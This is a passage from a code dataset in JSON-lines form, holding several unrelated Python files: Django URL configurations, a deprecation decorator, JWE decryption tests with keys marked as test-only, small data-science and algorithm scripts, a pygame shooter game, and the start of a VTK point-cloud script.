jsonify(response_data.to_dict())\n\n return unmarshal_decorator\n\n\n# https://stackoverflow.com/questions/2536307/how-do-i-deprecate-python-functions/40301488#40301488\ndef deprecated(reason):\n \"\"\"\n This is a decorator which can be used to mark functions\n as deprecated. It will result in a warning being emitted\n when the function is used.\n \"\"\"\n\n if isinstance(reason, string_types):\n\n # The @deprecated is used with a 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated(\"please, use another function\")\n # def old_function(x, y):\n # pass\n\n def decorator(func1):\n\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n\n @wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason), category=DeprecationWarning, stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n\n return new_func1\n\n return decorator\n\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n\n # The @deprecated is used without any 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated\n # def old_function(x, y):\n # pass\n\n func2 = reason\n\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n\n @wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(fmt2.format(name=func2.__name__), category=DeprecationWarning, stacklevel=2)\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs)\n\n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n\n\n@deprecated('Use eduid_common.api.decorators.deprecated instead')\nclass Deprecated(object):\n \"\"\"\n Mark deprecated functions with this decorator.\n\n Attention! 
Use it as the innermost decorator, closest to the function you decorate.\n\n    :param message: The deprecation message\n    :type message: str | unicode\n    \"\"\"\n\n    def __init__(self, message=None):\n        self.message = message\n\n    def __call__(self, func):\n        if self.message is None:\n            self.message = 'Deprecated function {!r} called'.format(func.__name__)\n\n        @wraps(func)\n        def new_func(*args, **kwargs):\n            warnings.warn(self.message, category=DeprecationWarning, stacklevel=2)\n            return func(*args, **kwargs)\n\n        # work around a bug in functools.wraps that's fixed in Python 3.2\n        if getattr(new_func, '__wrapped__', None) is None:\n            new_func.__wrapped__ = func\n        return new_func\n","sub_path":"src/eduid_common/api/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"304752754","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (CategoryViewSet, CommentViewSet, GenreViewSet,\n                    ReviewViewSet, TitleViewSet)\n\nrouter = DefaultRouter()\nrouter.register(r'genres', GenreViewSet, 'Genre')\nrouter.register(r'categories', CategoryViewSet, 'Category')\nrouter.register(r'titles', TitleViewSet, 'Title')\nrouter.register(r'titles/(?P<title_id>[0-9]+)/reviews', ReviewViewSet)\nrouter.register(\n    r'titles/(?P<title_id>[0-9]+)/reviews/(?P<review_id>[0-9]+)/comments',\n    CommentViewSet)\n\nurlpatterns = [\n    path('v1/', include('users.urls')),\n    path('v1/', include(router.urls)),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467319553","text":"import pandas as pd\r\ndata=pd.read_csv(\"data.csv\")\r\n\r\n#####Splitting Dataset Into Train and Test##############\r\n# note: sklearn.cross_validation is the old pre-0.18 module name; newer\r\n# releases expose StratifiedShuffleSplit from sklearn.model_selection\r\nfrom sklearn.cross_validation import StratifiedShuffleSplit\r\nsss = StratifiedShuffleSplit(data['Gender'], 3, test_size=0.5, random_state=0)\r\nfor train_index, test_index in sss:\r\n    print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n    X_train, X_test = data.iloc[train_index], data.iloc[test_index]\r\n    y_train, y_test = data['Gender'].iloc[train_index], data['Gender'].iloc[test_index]\r\n\r\n######Converting Categorical To Numerical##############\r\n#from sklearn.preprocessing import LabelEncoder\r\n#le = LabelEncoder()\r\n#var_mod = ['LastLetter','LastTwoLetter','FirstLetter']\r\n#for i in var_mod:\r\n#    train[i] = le.fit_transform(train[i])\r\n#    test[i] = le.fit_transform(test[i])\r\n#\r\n##Following Gaussian Distribution\r\n#train.loc['LastLetter']['Gender'==1].plot.density()\r\n#train['LastTwoLetter'].plot.density() \r\n#train['FirstLetter'].plot.density()\r\n#\r\n#\r\n#import numpy as np\r\n#from sklearn.naive_bayes import GaussianNB\r\n#model = GaussianNB()\r\n#\r\n######Training Part##############\r\n#numpyMatrix_train = train.as_matrix()\r\n#x=np.array(numpyMatrix_train[:,[2,3,4]]).astype('int')\r\n#y=np.array(numpyMatrix_train[:,1]).astype('int')\r\n#model.fit(x,y)\r\n#\r\n######Testing Part##############\r\n#numpyMatrix_test = test.as_matrix()\r\n#X_test=np.array(numpyMatrix_test[:,[2,3,4]]).astype('int')\r\n#Y_actual=np.array(numpyMatrix_test[:,1]).astype('int')\r\n#Y_test= model.predict(X_test)\r\n#\r\n######Confusion Matrix##############\r\n#from sklearn.metrics import confusion_matrix\r\n#cnf_matrix = confusion_matrix(Y_actual, Y_test)\r\n#print(cnf_matrix)\r\n#\r\n#from sklearn import tree\r\n#clf = tree.DecisionTreeClassifier()\r\n#clf = clf.fit(x, 
y)\r\n#Y_test_decisiontree=clf.predict(X_test)\r\n#cnf_matrix_decisontree = confusion_matrix(Y_actual, Y_test_decisiontree)\r\n#print(cnf_matrix_decisontree)\r\n","sub_path":"NaiveBayesianPython.py","file_name":"NaiveBayesianPython.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"268994660","text":"from Myemail import Myemail\nfrom Nifty50 import Nifty50\nfrom keyvaluedao import KeyvalueDAO\nimport sqlite3\n\nprint(\"Invoked the advanced decline\")\nnifty50 = Nifty50()\nkeyvaluedao = KeyvalueDAO()\nconn = sqlite3.connect(\"stock.db\")\nflag = keyvaluedao.getValue(conn, \"advance_notify\")\n\nif flag == \"true\":\n output = nifty50.getnifty50()\n advance = output[\"advances\"]\n decline = output[\"declines\"]\n\n subject = \"Advance: \" + str(advance) + \" Decline: \" + str(decline)\n\n counter = 0\n message = \"\"\n while counter < 50:\n message = message + output[\"data\"][counter][\"symbol\"] + \" \" + output[\"data\"][counter][\"per\"] + \"\\n\"\n counter = counter + 1\n #print(message)\n\n myemail = Myemail()\n myemail.send_email(\"aruna\", \"aruna\", \"report\", subject, message)\n\n\n\n","sub_path":"hourlyadde.py","file_name":"hourlyadde.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"240970077","text":"import pytest\n\nfrom sdc.crypto.decrypter import decrypt\nfrom sdc.crypto.key_store import KeyStore\nfrom sdc.crypto.exceptions import InvalidTokenException\nfrom tests import TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM, TEST_DO_NOT_USE_SR_PRIVATE_PEM\nfrom tests import TOO_FEW_TOKENS_JWE, VALID_JWE\n\n\nKEY_PURPOSE_AUTHENTICATION = \"authentication\"\n\n# jwt.io public key signed\nTEST_DO_NOT_USE_PUBLIC_KEY = \"\"\"-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3Wojg\nGHFHYLugdUWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlv\ndbH6dvEOfou0/gCFQsHUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GU\nnKHkkle+Q0pX/g6jXZ7r1/xAK5Do2kQ+X5xK9cipRgEKwIDAQAB\n-----END PUBLIC KEY-----\"\"\"\n\n\nclass TestDecrypter:\n\n key_store = KeyStore({\n \"keys\": {\n \"e19091072f920cbf3ca9f436ceba309e7d814a62\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'private',\n 'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM},\n \"EQ_USER_AUTHENTICATION_SR_PRIVATE_KEY\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'private',\n 'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM},\n \"EDCRRM\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'public',\n 'value': TEST_DO_NOT_USE_PUBLIC_KEY},\n \"709eb42cfee5570058ce0711f730bfbb7d4c8ade\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'public',\n 'value': TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM},\n }\n })\n\n def test_decrypt(self):\n json = decrypt(VALID_JWE, self.key_store, KEY_PURPOSE_AUTHENTICATION)\n assert json == {'user': 'jimmy', 'iat': 1498137519.135479, 'exp': 1.0000000000014982e+21}\n\n def test_decrypt_too_few_tokens_in_jwe(self):\n \"\"\"Tests an InvalidTokenException when the token isn't comprised of 5 parts, seperated by several '.' 
characters\"\"\"\n with pytest.raises(InvalidTokenException):\n decrypt(TOO_FEW_TOKENS_JWE, self.key_store, KEY_PURPOSE_AUTHENTICATION)\n","sub_path":"tests/test_decrypter.py","file_name":"test_decrypter.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"236797007","text":"import cv2\n\ncapt = cv2.VideoCapture(0)\n\nclassifer = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nwhile True:\n\n ret, img = capt.read()\n\n if ret:\n faces = classifer.detectMultiScale(img)\n \n for face in faces:\n x, y, w, h = face\n img = cv2.rectangle(img, (x,y), (x+w, y+h), (255, 0, 0), 4)\n \n cv2.imshow(\"face detection program\", img)\n\n key = cv2.waitKey(1)\n\n if key == ord(\"q\"):\n break;\n\ncapt.release()\ncv2.destroyAllWindows()","sub_path":"Desktop/Santushti/python_work/ml_face_detect.py","file_name":"ml_face_detect.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"479108559","text":"\"\"\"\n-------------------------------------------------------------------------------\nName: ShooterGame.py\nPurpose:\nA simple, fun 2d shooter game based on python and pygame\nAuthor: P. Andy\nCreated on: 06/16/2016\n------------------------------------------------------------------------------\n\"\"\"\n\n# Import necessary library\nimport pygame\nfrom pygame.locals import *\nimport random\nimport math\n\n### Initialize the game\n\n# Screen\npygame.init()\nwidth, height = 1200, 600\nscreen=pygame.display.set_mode((width, height))\n\n# Player movement\nkeys = [False, False, False, False]\nplayer_position = [600,300]\n\n# Bullet\naccuracy = [0,0]\nbullets = []\n\n# Enemy related\nenemy_timer = 100\nenemy_timer2 = 0\nenemies = [[1200,100]]\nhealth_value = 194\n\n### Load images\n\n# The character that the player will control\nplayer = pygame.image.load(\"image/hero.png\").convert_alpha()\nplayer = pygame.transform.scale(player, (100, 100))\n\n# The wooden tiles on the bakcground\nbackground = pygame.image.load(\"image/background.png\")\nbackground = pygame.transform.scale(background, (100, 100))\n\n# The girls that the player must protect\nobjective = pygame.image.load(\"image/girl.png\")\nobjective = pygame.transform.scale(objective, (90, 90))\n\n# The bullet that the character will shoot\nbullet = pygame.image.load(\"image/bullet.png\")\n\n# Enemies that need to be defeated\nslime = pygame.image.load(\"image/slime.png\")\nslime = pygame.transform.scale(slime, (50,50))\nslime1 = slime\n\n# For the health meter\nhealth_bar = pygame.image.load(\"image/healthbar.png\")\nhealth = pygame.image.load(\"image/health.png\")\n\n# Ending\nlose_message = pygame.image.load(\"image/lose_message.png\")\nlose_message = pygame.transform.scale(lose_message, (1200,600))\nwin_message = pygame.image.load(\"image/win_message.png\")\nwin_message = pygame.transform.scale(win_message, (1200,600))\n\n# All the audio\n\n# 3.1 - Load audio\nobjective_damage = pygame.mixer.Sound(\"audio/objective_damage.wav\")\nenemy_death = pygame.mixer.Sound(\"audio/enemy_death.wav\")\nbullet_fire = pygame.mixer.Sound(\"audio/bullet.wav\")\nobjective_damage.set_volume(0.05)\nenemy_death.set_volume(0.05)\nbullet_fire.set_volume(0.05)\npygame.mixer.music.load('audio/bgm.mp3')\npygame.mixer.music.play(-1, 0.0)\npygame.mixer.music.set_volume(0.35)\n\n# Conditions for lose and win\nrunning = 1\nexitcode = 0\n\n### Loop until game is completed\nwhile 
running:\n\n # To spawn enemies at constant pattern\n enemy_timer -= 1\n\n # Clear the screen\n screen.fill(0)\n\n # Draw the background and objective\n for x in range(width/background.get_width()+1):\n for y in range(height/background.get_height()+1):\n screen.blit(background,(x*100,y*100))\n\n # Draw the objective (girls)\n screen.blit(objective, (0,10))\n screen.blit(objective, (0,110))\n screen.blit(objective, (0,210))\n screen.blit(objective, (0,310))\n screen.blit(objective, (0,410))\n screen.blit(objective, (0,510))\n\n # Complicated math formula involving trigonometry\n # For rotation of the player based on the mouse cursor\n mouse_position = pygame.mouse.get_pos()\n angle = math.atan2(mouse_position[1] - (player_position[1] + 32), mouse_position[0] - (player_position[0] + 26))\n player_rotation = pygame.transform.rotate(player, 360 - angle * 57.29)\n player_position2 = (player_position[0] - player_rotation.get_rect().width / 2,\n player_position[1] - player_rotation.get_rect().height / 2)\n screen.blit(player_rotation, player_position2)\n\n # Code for player firing bullet\n for i in bullets:\n\n # Initialize and set up basic info\n index = 0\n velx = math.cos(i[0]) * 10\n vely = math.sin(i[0]) * 10\n i[1] += velx\n i[2] += vely\n\n # If out of boundary, delete it.\n if i[1] < -64 or i[1] > 1200 or i[2] <- 64 or i[2] > 600:\n bullets.pop(index)\n\n index+=1\n\n # Calculate bullet's rotation and draw it on the screen\n for projectile in bullets:\n bullet2 = pygame.transform.rotate(bullet, 360 - projectile[0] * 57.29)\n screen.blit(bullet2, (projectile[1], projectile[2]))\n\n # Draw the enemy slime\n\n if enemy_timer == 0:\n enemies.append([1200, random.randint(50, 550)])\n enemy_timer = 100 - (enemy_timer2 * 2)\n\n if enemy_timer2 >= 35:\n enemy_timer2 = 35\n\n else:\n enemy_timer2 += 5\n\n index = 0\n\n for enemy in enemies:\n\n if enemy[0] < -64:\n enemies.pop(index)\n enemy[0] -= 5\n\n # Allow the enemies to attack the objective\n enemy_rect = pygame.Rect(slime1.get_rect())\n enemy_rect.top = enemy[1]\n enemy_rect.left = enemy[0]\n\n if enemy_rect.left < 64:\n objective_damage.play()\n health_value -= random.randint(5, 20)\n enemies.pop(index)\n\n # Check if bullet collides with slime\n index1 = 0\n\n for i in bullets:\n\n # Set up rectangles to check collision\n bullet_rect = pygame.Rect(bullet.get_rect())\n bullet_rect.left = i[1]\n bullet_rect.top = i[2]\n\n # If it does, eliminate both the bullet and the enemy\n if enemy_rect.colliderect(bullet_rect):\n enemy_death.play()\n accuracy[0] += 1\n enemies.pop(index)\n bullets.pop(index1)\n\n index1 += 1\n\n # Next slime\n index += 1\n\n for enemy in enemies:\n screen.blit(slime1, enemy)\n\n # Draw the time display which indicates how long the game will last\n font = pygame.font.Font(None, 46)\n survivedtext = font.render(str((30000 - pygame.time.get_ticks()) / 60000)+ \":\" + str((30000 - pygame.time.get_ticks()) / 1000 % 60).zfill(2), True, (0,0,0))\n textRect = survivedtext.get_rect()\n textRect.topright = [1195, 5]\n screen.blit(survivedtext, textRect)\n\n # Draw the health meter, displaying amount of health left\n screen.blit(health_bar, (100,10))\n for health1 in range(health_value):\n screen.blit(health, (health1+103,13))\n\n # Update the screen\n pygame.display.flip()\n\n # Main loop for the event codes\n for event in pygame.event.get():\n\n # Allow the player to end the game at their convenience\n if event.type==pygame.QUIT:\n pygame.quit()\n exit(0)\n\n # Change the status to true when the keys are pressed\n elif 
event.type == pygame.KEYDOWN:\n if event.key == K_w:\n keys[0] = True\n elif event.key == K_a:\n keys[1] = True\n elif event.key == K_s:\n keys[2] = True\n elif event.key == K_d:\n keys[3] = True\n\n # Revert when the keys are lifted\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_w:\n keys[0] = False\n elif event.key == pygame.K_a:\n keys[1] = False\n elif event.key==pygame.K_s:\n keys[2] = False\n elif event.key == pygame.K_d:\n keys[3] = False\n\n # Complicated math formula for bullet and its rotation\n elif event.type == pygame.MOUSEBUTTONDOWN:\n bullet_fire.play()\n position = pygame.mouse.get_pos()\n accuracy[1] += 1\n bullets.append([math.atan2(position[1] - (player_position2[1] + 32), position[0]\n - (player_position2[0] + 26)),player_position2[0] + 32, player_position2[1] + 32])\n\n # While status is true, move the player (direction depends on which key)\n if keys[0]:\n player_position[1] -= 5\n elif keys[2]:\n player_position[1] += 5\n elif keys[1]:\n player_position[0] -= 5\n elif keys[3]:\n player_position[0] += 5\n\n # Check whether player loses or wins\n\n # Win condition\n if pygame.time.get_ticks() >= 30000:\n running=0\n exitcode=1\n\n # Lose condition\n elif health_value <= 0:\n running=0\n exitcode=0\n\n # Calculate accuracy percentage (given that player landed at least one shot)\n elif accuracy[1] != 0:\n accuracy1 = accuracy[0] * 1.0 / accuracy[1]*100\n\n else:\n accuracy1 = 0\n\n# Display ending based one whether player wins or loses\n\n# Player loses\nif exitcode == 0:\n pygame.font.init()\n font = pygame.font.Font(None, 46)\n text = font.render(\"Accuracy: \"+str(accuracy1)+\"%\", True, (255,0,0))\n textRect = text.get_rect()\n textRect.centerx = screen.get_rect().centerx\n textRect.centery = screen.get_rect().centery+24\n screen.blit(lose_message, (0,0))\n screen.blit(text, textRect)\n\n# Player wins\nelse:\n pygame.font.init()\n font = pygame.font.Font(None, 46)\n text = font.render(\"Accuracy: \"+str(accuracy1)+\"%\", True, (0,255,0))\n textRect = text.get_rect()\n textRect.centerx = screen.get_rect().centerx\n textRect.centery = screen.get_rect().centery+24\n screen.blit(win_message, (0,0))\n screen.blit(text, textRect)\n\nwhile 1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit(0)\n pygame.display.flip()","sub_path":"ShooterGame.py","file_name":"ShooterGame.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"160649123","text":"class Node(object):\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n\nclass BST(object):\n def __init__(self, root):\n self.root = Node(root)\n\n def insert(self, new_val):\n self.insert_helper(self.root, new_val)\n\n def insert_helper(self, current, new_val):\n if new_val < current.value:\n if current.left:\n self.insert_helper(current.left, new_val)\n else:\n current.left = Node(new_val)\n elif new_val > current.value:\n if current.right:\n self.insert_helper(current.right, new_val)\n else:\n current.right = Node(new_val)\n else:\n print(f\"{new_val} is already in the tree\")\n\n def search(self, find_val):\n return self.search_helper(self.root, find_val)\n\n def search_helper(self, current, find_val):\n if current:\n if current.value == find_val:\n return True\n elif current.value > find_val:\n return self.search_helper(current.left, find_val)\n else:\n return self.search_helper(current.right, find_val)\n\n def inorder_list(self, current, 
L):\n        if current:\n            L = self.inorder_list(current.left, L)\n            L.append(current.value)\n            L = self.inorder_list(current.right, L)\n        return L\n\n    def is_BST(self):\n        # an inorder traversal of a BST is strictly increasing: pop the\n        # increasing tail and check whether anything out of order remains\n        L = self.inorder_list(self.root, [])\n        while len(L) > 1 and L[-1] > L[-2]:\n            L.pop()\n        return len(L) < 2\n    \nbst = BST(8)\nbst.insert(3)\nbst.insert(10)\nbst.insert(1)\nbst.insert(6)\nbst.insert(9)\nbst.insert(11)\n\nprint(bst.is_BST())","sub_path":"Binary Trees/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"157633599","text":"#--------------------------------------------------------------------------------\n# Just a mini script to review statistical functions & implement them in Python\n# \n# Currently supported functions:\n# - mean\n# - median\n# - variance\n# - standard deviation\n# - range\n# - 1st Quartile / 25th Percentile / 0.25 Quantile\n# - 3rd Quartile / 75th Percentile / 0.75 Quantile\n# - IQR\n#--------------------------------------------------------------------------------\nimport math\n\n# Functions that already exist in Python:\n# sum()\n# max()\n# min()\n# len()\n# sorted()\n\n# returns the average value of all elements in arr\ndef mean( arr ):\n\treturn sum(arr) / len(arr)\n\n# if array length == EVEN, return avg of the 2 middle values\n# if array length == ODD, return middle value\ndef median( arr ):\n\tarr = sorted(arr)\n\tlength = len(arr)\n\n\tif not(length > 0):\n\t\tprint( \"Array must at least have a length > 0\")\n\t\treturn\n\n\t# if number is even\n\tif( length % 2 == 0):\n\t\t# return avg of the 2 middle values\n\t\treturn ( arr[ int(length/2) ] + arr[ int((length/2)-1) ] ) / 2\n\t# else number is odd\n\telse:\n\t\t# returns the middle value\n\t\treturn arr[ int(length/2) ]\n\n# return variance of all elements in arr\ndef variance( arr ):\n\tmeanVal = mean(arr)\t\t\t# get mean value of array\n\tvar_sum = 0\t\t\t\t\t# sum of (difference to the mean, squared)\n\n\t# Calculating summation term in variance formula\n\tfor i in range( len(arr) ):\n\t\ttemp = arr[i] - meanVal\t\t\t\n\t\tvar_sum += math.pow( temp, 2 )\n\n\treturn var_sum / ( len( arr ) - 1 )\t# return variance = var_sum / (N-1)\n\n# return standard deviation of all elements in arr\ndef sd( arr ):\n\treturn math.sqrt( variance( arr ) )\n\n# return the range (max - min) of arr\ndef Range( arr ):\n\treturn max(arr)-min(arr)\n\n#-------------------------------------------------------\n# No standard method to calc. quar_1(), quar_3() & iqr()\n# so I'll be using the method taught in class\n#-------------------------------------------------------\n# return the 1st quartile / 25th percentile / 0.25 quantile of the arr\n# i.e. returns the median of the lower half array\ndef quar_1(arr):\n\tarr = sorted(arr)\n\tlength = len(arr)\n\n\tif not(length > 0):\n\t\tprint( \"Array must at least have a length > 0\")\n\t\treturn\n\n\t# if number is even\n\tif( length % 2 == 0):\n\t\t# divide arr into 2 and return median of lower half\n\t\treturn median( arr[:int(length/2)] )\n\t# else number is odd\n\telse:\n\t\t# ignore the median, then divide arr into 2 and return median of lower half\n\t\treturn median( arr[:int((length-1)/2)] )\n\n
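# Editor's note (worked example, not in the original script): for the testarr\n# defined at the bottom, sorted([5,9,14,4,6,3,1]) is [1,3,4,5,6,9,14]. The\n# length (7) is odd, so the median 5 is set aside: quar_1 is the median of the\n# lower half [1,3,4] = 3, quar_3 below is the median of the upper half\n# [6,9,14] = 9, and the IQR is 9 - 3 = 6.\n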
# return the 3rd quartile / 75th percentile / 0.75 quantile of the arr\n# i.e. returns the median of the upper half array\ndef quar_3(arr):\n\tarr = sorted(arr)\n\tlength = len(arr)\n\n\tif not(length > 0):\n\t\tprint( \"Array must at least have a length > 0\")\n\t\treturn\n\n\t# if number is even\n\tif( length % 2 == 0):\n\t\t# divide arr into 2 and return median of upper half\n\t\treturn median( arr[int(length/2):] )\n\t# else number is odd\n\telse:\n\t\t# ignore the median, then divide arr into 2 and return median of upper half\n\t\treturn median( arr[int((length+1)/2):] )\n\n# return the IQR value of arr\ndef iqr( arr ):\n\treturn quar_3(arr) - quar_1(arr)\n\n#----------------------------------------------------------------------------------\ntestarr = [5,9,14,4,6,3,1]\n\nprint( \"INPUT ---> \\t\", testarr )\nprint( \"SORTED --> \\t\", sorted(testarr) )\nprint( \"COUNT(#) = \\t\", len(testarr) )\nprint( \"MAX = \\t\", max(testarr) ) \nprint( \"MIN = \\t\", min(testarr) ) \nprint( \"RANGE = \\t\", Range(testarr) )\nprint()\nprint( \"MEAN = \\t\", mean( testarr ) )\nprint( \"1st QUAR = \\t\", quar_1(testarr) ) \nprint( \"MEDIAN = \\t\", median( testarr ) )\nprint( \"3rd QUAR = \\t\", quar_3(testarr) ) \nprint( \"IQR = \\t\", iqr(testarr) ) \nprint( \"VARIANCE = \\t\", variance(testarr) )\nprint( \"SD = \\t\", sd(testarr) ) \n","sub_path":"STAT251/statsCalculator.py","file_name":"statsCalculator.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"443976316","text":"from django.conf.urls import url\n\nfrom .views import (\n    DashboardView,\n\n    ProjectCreateView,\n    ProjectDeleteView,\n    ProjectUpdateView,\n    ProjectView,\n\n    TaskCreateView,\n    TaskDeleteView,\n    TaskDetailView,\n    TaskDoneView,\n    TaskUpdateView,\n    TaskAssignTeamMemberUpdateView,\n\n    TeamMemberCreateView,\n    TeamMemberDetailView,\n    TeamMemberUpdateView,\n    TeamMemberDeleteView,\n)\n\nurlpatterns = (\n    url(r'^$', DashboardView.as_view(), name='dashboard'),\n    url(r'^project/create/$', ProjectCreateView.as_view(),\n        name='project_create'),\n    url(r'^project/(?P<pk>[0-9]+)$', ProjectView.as_view(), name='project'),\n    url(r'^project/(?P<pk>[0-9]+)/update$',\n        ProjectUpdateView.as_view(), name='project_update'),\n    url(r'^project/(?P<pk>[0-9]+)/delete$',\n        ProjectDeleteView.as_view(), name='project_delete'),\n\n    url(r'^project/(?P<pk>[0-9]+)/task_create',\n        TaskCreateView.as_view(), name='task_create'),\n    url(r'^task/(?P<pk>[0-9]+)$',\n        TaskDetailView.as_view(), name='task'),\n    url(r'^task/(?P<pk>[0-9]+)/update$',\n        TaskUpdateView.as_view(), name='task_update'),\n    url(r'^task/(?P<pk>[0-9]+)/update_team_members$',\n        TaskAssignTeamMemberUpdateView.as_view(),\n        name='task_update_team_members'),\n    url(r'^task/(?P<pk>[0-9]+)/delete$',\n        TaskDeleteView.as_view(), name='task_delete'),\n    url(r'^task/(?P<pk>[0-9]+)/done$',\n        TaskDoneView.as_view(), name='task_done'),\n\n    url(r'^teammember/create$',\n        TeamMemberCreateView.as_view(), name='team_member_create'),\n    url(r'^teammember/(?P<pk>[0-9]+)$',\n        TeamMemberDetailView.as_view(), name='team_member'),\n    url(r'^teammember/(?P<pk>[0-9]+)/update$',\n        TeamMemberUpdateView.as_view(), name='team_member_update'),\n    url(r'^teammember/(?P<pk>[0-9]+)/delete$',\n        TeamMemberDeleteView.as_view(), name='team_member_delete'),\n\n)\n","sub_path":"remindmyteam.com/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356450341","text":"#!/usr/bin/env python\n\nclass FenwickTree():\n    \"\"\"\n    Data structure for providing O(lg(n)) single element alteration\n    and range sum query. All indices are one based.\n    \"\"\"\n    def __init__(self, num_elements):\n        # over-allocated so updates can walk past num_elements without\n        # bounds checks; n + 1 slots is the minimum for a 1-indexed tree\n        self.num_elements = 4 * num_elements + 1\n        self.array = [0] * self.num_elements\n\n    @staticmethod\n    def _get_fenwick_step_length(num):\n        return num & -num\n\n
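    # Editor's note (added comment, not in the original file): num & -num\n    # isolates the lowest set bit of num in two's complement arithmetic,\n    # e.g. 12 & -12 == 4 (0b1100 -> 0b0100); that bit is the step length\n    # used below to hop between Fenwick-tree nodes.\n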
    def alter(self, index, amount):\n        \"\"\"\n        Alter the element at index and add amount to it\n        \"\"\"\n        while index < self.num_elements:\n            self.array[index] += amount\n            index += self._get_fenwick_step_length(index)\n\n    def query(self, from_index, to_index):\n        \"\"\"\n        Sum of the elements between from_index and to_index, both inclusive\n        \"\"\"\n        return self._query(to_index) - self._query(from_index - 1)\n\n    def _query(self, index):\n        result = 0\n        while index > 0:\n            result += self.array[index]\n            index -= self._get_fenwick_step_length(index)\n        return result\n\n\nif __name__ == \"__main__\":\n    fw = FenwickTree(10)\n    fw.alter(1, 1)\n    fw.alter(2, 2)\n    fw.alter(3, 3)\n    fw.alter(4, 4)\n    \n    for i in range(1, 4 + 1):\n        for j in range(i, 4 + 1):\n            expected = 0\n            for k in range(i, j + 1):\n                expected += k\n            assert expected == fw.query(i, j)\n","sub_path":"Data Structures/Fenwick Tree/Python/FenwickTree.py","file_name":"FenwickTree.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"27870412","text":"#!/usr/bin/env python\nfrom vtkmodules.vtkCommonCore import vtkMath\nfrom vtkmodules.vtkCommonDataModel import vtkSphere\nfrom vtkmodules.vtkCommonSystem import vtkTimerLog\nfrom vtkmodules.vtkFiltersCore import (\n    vtkHedgeHog,\n    vtkMaskPoints,\n)\nfrom vtkmodules.vtkFiltersModeling import vtkOutlineFilter\nfrom vtkmodules.vtkFiltersPoints import (\n    vtkBoundedPointSource,\n    vtkFitImplicitFunction,\n    vtkPCANormalEstimation,\n)\nfrom vtkmodules.vtkRenderingCore import (\n    vtkActor,\n    vtkPointGaussianMapper,\n    vtkPolyDataMapper,\n    vtkRenderWindow,\n    vtkRenderWindowInteractor,\n    vtkRenderer,\n)\nimport vtkmodules.vtkInteractionStyle\nimport vtkmodules.vtkRenderingFreeType\nimport vtkmodules.vtkRenderingOpenGL2\nfrom vtkmodules.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Interpolate onto a volume\n\n# Parameters for debugging\nNPts = 1000000\nmath = vtkMath()\nmath.RandomSeed(31415)\n\n# create pipeline\n#\npoints = vtkBoundedPointSource()\npoints.SetNumberOfPoints(NPts)\npoints.ProduceRandomScalarsOn()\npoints.ProduceCellOutputOff()\npoints.Update()\n\n# Create a sphere implicit 
